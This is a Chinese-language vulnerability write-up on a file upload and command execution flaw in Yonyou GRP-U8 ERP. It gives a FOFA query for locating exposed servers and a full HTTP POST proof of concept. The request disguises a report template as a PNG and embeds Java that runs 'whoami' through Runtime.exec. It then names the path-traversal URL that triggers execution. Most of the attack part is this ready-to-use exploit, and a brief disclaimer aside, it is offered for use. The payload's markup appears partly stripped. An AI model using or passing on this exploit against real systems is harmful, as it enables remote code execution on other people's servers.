用友 GRP U8 UploadFile 命令执行漏洞

---

前言

用友GRP-U8是一款功能全面、灵活度高、可定制性强的ERP软件，能够协助企业实现资源的高效管理，优化企业运营流程，提升整体管理水平。该产品存在任意文件上传漏洞。

---

声明

请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

---

一、漏洞描述

用友GRP-U8是一款功能全面、灵活度高、可定制性强的ERP软件，能够协助企业实现资源的高效管理，优化企业运营流程，提升整体管理水平。该产品存在任意文件上传漏洞。

二、影响版本

用友GRP-U8

三、漏洞复现

FOFA: app="用友-GRP-U8" && port="88"

利用POC

POST /UploadFile HTTP/1.1
Host: XXX.XX.XX.XX:88
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
Cookie: JSESSIONID=18F403D91DD537D8DAA24D5A4B45C818
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryicNNJvjQHmXpnjFc
Content-Length: 3491

------WebKitFormBoundaryicNNJvjQHmXpnjFc
Content-Disposition: form-data; name="input_localfile"; filename="demodemo.png"
Content-Type: application/octet-stream





panel


header
753
80


-65536
41
15
362
62


100


footer
802
753
280
103


body
80
753
722


学生表
115
77


家庭成员

united-level:1;

3
0
2



关系
-4144897


3
1



性别
-4144897


3
2



年龄
-4144897


3
3



得分


2
0



性别


1
0



姓名


0
0



=$学生表


0
1
3



=$学生表.value()


1
1
3



=$学生表.getName()


2
1
3




4
0
4






4
3






4
2



;


4
1



成员


60,60,60,60
20,20,20,20,20


102








成员
$.value()


学生表
new Object[]{new BufferedReader(new InputStreamReader(java.lang.Runtime.getRuntime().exec("whoami").getInputStream())).readLine()}




------WebKitFormBoundaryicNNJvjQHmXpnjFc
Content-Disposition: form-data; name="type"

1
------WebKitFormBoundaryicNNJvjQHmXpnjFc—

执行结果如下

然后访问 /u8qx/tools/defaultviewer.jsp?file=../../upload/demodemo.png